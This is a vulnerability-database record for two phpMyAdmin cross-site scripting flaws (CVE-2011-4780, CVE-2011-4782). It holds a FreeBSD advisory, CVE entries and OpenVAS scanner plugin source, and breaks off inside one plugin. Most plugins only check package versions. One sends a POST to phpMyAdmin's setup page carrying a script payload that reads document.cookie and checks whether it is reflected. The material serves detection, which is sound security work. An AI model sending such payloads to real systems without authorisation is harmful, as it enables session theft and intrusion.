{"id": "8C83145D-2C95-11E1-89B4-001EC9578670", "bulletinFamily": "unix", "title": "phpMyAdmin -- Multiple XSS", "description": "\nThe phpMyAdmin development team reports:\n\nUsing crafted url parameters, it was possible to produce XSS on\n\t the export panels in the server, database and table sections.\n\n\nCrafted values entered in the setup interface can produce XSS;\n\t also, if the config directory exists and is writeable, the XSS\n\t payload can be saved to this directory.\n\n", "published": "2011-12-16T00:00:00", "modified": "2011-12-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vuxml.freebsd.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html", "reporter": "FreeBSD", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php"], "cvelist": ["CVE-2011-4782", "CVE-2011-4780"], "type": "freebsd", "lastseen": "2018-08-31T01:15:11", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "packageVersion": "3.4.9.r1"}], "bulletinFamily": "unix", "cvelist": ["CVE-2011-4782", "CVE-2011-4780"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "\nThe phpMyAdmin development team reports:\n\nUsing crafted url parameters, it was possible to produce XSS on\n\t the export panels in the server, database and table sections.\n\n\nCrafted values entered in the setup interface can produce XSS;\n\t also, if the config directory exists and is writeable, the XSS\n\t payload can be saved to this directory.\n\n", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "ce46a820e8f594fbe926c0d2ebc82de15120a6ba7870c282abf8a989b9609313", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "afcc60996e3abe9144808acf4ab3573d", "key": "published"}, {"hash": "62278e2ae88f5f6b257332b8d1621ce2", "key": "references"}, {"hash": "afcc60996e3abe9144808acf4ab3573d", "key": "modified"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "a0b17a6cedd0d53fc7c79c2fd84830b3", "key": "cvelist"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "956ec2cf6eeb110c65f584654e5e3dfb", "key": "affectedPackage"}, {"hash": "c57d97e5ecd53041da66c6b72e0954b9", "key": "title"}, {"hash": "5a2e0b12192c7568f0a48fc661e85e5f", "key": "description"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "aa7c76d10ab55da4105fac875248c7b6", "key": "href"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html", "id": "8C83145D-2C95-11E1-89B4-001EC9578670", "lastseen": "2016-09-26T17:24:41", "modified": "2011-12-16T00:00:00", "objectVersion": "1.2", "published": "2011-12-16T00:00:00", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php"], "reporter": "FreeBSD", "title": "phpMyAdmin -- Multiple XSS", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:24:41"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "packageVersion": "3.4.9.r1"}], "bulletinFamily": "unix", "cvelist": ["CVE-2011-4782", "CVE-2011-4780"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nThe phpMyAdmin development team reports:\n\nUsing crafted url parameters, it was possible to produce XSS on\n\t the export panels in the server, database and table sections.\n\n\nCrafted values entered in the setup interface can produce XSS;\n\t also, if the config directory exists and is writeable, the XSS\n\t payload can be saved to this directory.\n\n", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "44234a89a22e8588964df6bf6d7954abef374076664214dbf98a6e0c62ad5c9a", "hashmap": [{"hash": "afcc60996e3abe9144808acf4ab3573d", "key": "published"}, {"hash": "62278e2ae88f5f6b257332b8d1621ce2", "key": "references"}, {"hash": "afcc60996e3abe9144808acf4ab3573d", "key": "modified"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a0b17a6cedd0d53fc7c79c2fd84830b3", "key": "cvelist"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "956ec2cf6eeb110c65f584654e5e3dfb", "key": "affectedPackage"}, {"hash": "c57d97e5ecd53041da66c6b72e0954b9", "key": "title"}, {"hash": "5a2e0b12192c7568f0a48fc661e85e5f", "key": "description"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "aa7c76d10ab55da4105fac875248c7b6", "key": "href"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html", "id": "8C83145D-2C95-11E1-89B4-001EC9578670", "lastseen": "2018-08-30T19:15:11", "modified": "2011-12-16T00:00:00", "objectVersion": "1.3", "published": "2011-12-16T00:00:00", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php"], "reporter": "FreeBSD", "title": "phpMyAdmin -- Multiple XSS", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:15:11"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "956ec2cf6eeb110c65f584654e5e3dfb"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "a0b17a6cedd0d53fc7c79c2fd84830b3"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "5a2e0b12192c7568f0a48fc661e85e5f"}, {"key": "href", "hash": "aa7c76d10ab55da4105fac875248c7b6"}, {"key": "modified", "hash": "afcc60996e3abe9144808acf4ab3573d"}, {"key": "published", "hash": "afcc60996e3abe9144808acf4ab3573d"}, {"key": "references", "hash": "62278e2ae88f5f6b257332b8d1621ce2"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "c57d97e5ecd53041da66c6b72e0954b9"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "ce46a820e8f594fbe926c0d2ebc82de15120a6ba7870c282abf8a989b9609313", "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4782", "CVE-2011-4780"]}, {"type": "openvas", "idList": ["OPENVAS:863964", "OPENVAS:1361412562310902802", "OPENVAS:136141256231070587", "OPENVAS:70587", "OPENVAS:863671", "OPENVAS:1361412562310863964", "OPENVAS:1361412562310863671", "OPENVAS:1361412562310831522", "OPENVAS:831522", "OPENVAS:70802"]}, {"type": "nessus", "idList": ["FEDORA_2011-17370.NASL", "OPENSUSE-2012-18.NASL", "FREEBSD_PKG_8C83145D2C9511E189B4001EC9578670.NASL", "FEDORA_2011-17369.NASL", "PHPMYADMIN_PMASA_2011_20.NASL", "GENTOO_GLSA-201201-01.NASL"]}, {"type": "seebug", "idList": ["SSV:30007", "SSV:26100"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-20", "PHPMYADMIN:PMASA-2011-19"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108110"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27487", "SECURITYVULNS:VULN:12117"]}, {"type": "gentoo", "idList": ["GLSA-201201-01"]}], "modified": "2018-08-31T01:15:11"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "packageVersion": "3.4.9.r1"}]}

{"cve": [{"lastseen": "2016-09-03T15:57:33", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in libraries/display_export.lib.php in phpMyAdmin 3.4.x before 3.4.9 allow remote attackers to inject arbitrary web script or HTML via crafted URL parameters, related to the export panels in the (1) server, (2) database, and (3) table sections.", "modified": "2012-11-06T00:04:28", "published": "2011-12-22T15:55:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4780", "id": "CVE-2011-4780", "title": "CVE-2011-4780", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-08-29T11:19:50", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in libraries/config/ConfigFile.class.php in the setup interface in phpMyAdmin 3.4.x before 3.4.9 allows remote attackers to inject arbitrary web script or HTML via the host parameter.", "modified": "2017-08-28T21:30:35", "published": "2011-12-22T15:55:01", "id": "CVE-2011-4782", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4782", "title": "CVE-2011-4782", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-01-02T10:58:02", "bulletinFamily": "scanner", "description": "Check for the Version of phpMyAdmin", "modified": "2017-12-29T00:00:00", "published": "2012-04-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863964", "id": "OPENVAS:863964", "title": "Fedora Update for phpMyAdmin FEDORA-2011-17369", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-17369\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, indexes,\n users, permissions), while you still have the ability to directly execute any\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execute,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\n creating PDF graphics of your database layout, creating complex queries using\n Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined functions,\n like displaying BLOB-data as image or download-link and much more...\";\n\ntag_affected = \"phpMyAdmin on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071537.html\");\n script_id(863964);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:39:13 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17369\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-17369\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.9~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-14T14:57:19", "bulletinFamily": "scanner", "description": "The host is running phpMyAdmin and is prone to cross site scripting\n vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2011-12-23T00:00:00", "id": "OPENVAS:1361412562310902802", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902802", "title": "phpMyAdmin Setup '$host' Variable Cross Site Scripting Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_phpmyadmin_setup_host_var_xss_vuln.nasl 13660 2019-02-14 09:48:45Z cfischer $\n#\n# phpMyAdmin Setup '$host' Variable Cross Site Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902802\");\n script_version(\"$Revision: 13660 $\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(51166);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 10:48:45 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-23 12:12:12 +0530 (Fri, 23 Dec 2011)\");\n script_name(\"phpMyAdmin Setup '$host' Variable Cross Site Scripting Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47338\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/108110/TWSL2011-019.txt\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the\n context of an affected site.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 3.4.x before 3.4.9\");\n script_tag(name:\"insight\", value:\"The flaw is due to improper validation of user-supplied input via\n the '$host' variable within the setup, which allows attackers to execute\n arbitrary HTML and script code in a user's browser session in the context\n of an affected site.\");\n script_tag(name:\"solution\", value:\"Upgrade to phpMyAdmin version 3.4.9 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"The host is running phpMyAdmin and is prone to cross site scripting\n vulnerability.\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/downloads.php\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nhost = http_host_name(port:port);\n\nurl = \"/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=add&submit=New+server\";\nreq = http_get(item:dir + url, port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\ntoken = eregmatch(pattern:'name=\"token\" value=\"([a-zA-Z0-9]+)\"', string:res);\nif(isnull(token[1])) {\n exit(0);\n}\ntoken = token[1];\n\ndata = string(\n \"tab_hash=&check_page_refresh=1&token=\",token,\"&Servers-0-verb\",\n \"ose=&Servers-0-host=<script>alert(document.cookie)</script>&S\",\n \"ervers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&S\",\n \"ervers-0-extension=mysqli&submit_save=Save&Servers-0-auth_typ\",\n \"e=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-au\",\n \"th_swekey_config=&Servers-0-auth_http_realm=&Servers-0-Signon\",\n \"Session=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-\",\n \"only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_\",\n \"db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=\",\n \"on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-\",\n \"0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABA\",\n \"SES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-control\",\n \"pass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Ser\",\n \"vers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&\",\n \"Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=\",\n \"&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-desig\",\n \"ner_coords=&Servers-0-tracking_default_statements=CREATE+TABL\",\n \"E%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2C\",\n \"DROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2C\",\n \"CREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTE\",\n \"R+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=o\",\n \"n&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add\",\n \"_drop_database=on\");\n\nurl = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',\n '&token=', token, '&page=servers&mode=add&submit=New+server');\n\nreq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", http_get_user_agent(), \"\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(data), \"\\r\\n\\r\\n\", data);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res =~ \"^HTTP/1\\.[01] 30\")\n{\n req = http_get(item:string(dir,\"/setup/index.php\"), port:port);\n req = string(chomp(req), '\\r\\nCookie: ', cookie, '\\r\\n\\r\\n');\n res = http_keepalive_send_recv(port:port, data:req);\n\n if(res =~ \"^HTTP/1\\.[01] 200\" && \"Use SSL (<script>alert(document.cookie)</script>)\" >< res){\n security_message(port);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-21T00:00:00", "published": "2012-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=70587", "id": "OPENVAS:70587", "title": "FreeBSD Ports: phpMyAdmin", "type": "openvas", "sourceData": "#\n#VID 8c83145d-2c95-11e1-89b4-001ec9578670\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 8c83145d-2c95-11e1-89b4-001ec9578670\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: phpMyAdmin\n\nCVE-2011-4780\nMultiple cross-site scripting (XSS) vulnerabilities in\nlibraries/display_export.lib.php in phpMyAdmin 3.4.x before 3.4.9\nallow remote attackers to inject arbitrary web script or HTML via\ncrafted URL parameters, related to the export panels in the (1)\nserver, (2) database, and (3) table sections.\n\nCVE-2011-4782\nCross-site scripting (XSS) vulnerability in\nlibraries/config/ConfigFile.class.php in the setup interface in\nphpMyAdmin 3.4.x before 3.4.9 allows remote attackers to inject\narbitrary web script or HTML via the host parameter.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\nhttp://www.vuxml.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70587);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 5999 $\");\n script_name(\"FreeBSD Ports: phpMyAdmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.9.r1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-18T14:41:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:1361412562310863964", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863964", "title": "Fedora Update for phpMyAdmin FEDORA-2011-17369", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-17369\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071537.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863964\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:39:13 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17369\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-17369\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.9~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-11T11:07:12", "bulletinFamily": "scanner", "description": "Check for the Version of phpMyAdmin", "modified": "2018-01-10T00:00:00", "published": "2012-01-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863671", "id": "OPENVAS:863671", "title": "Fedora Update for phpMyAdmin FEDORA-2011-17370", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-17370\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most 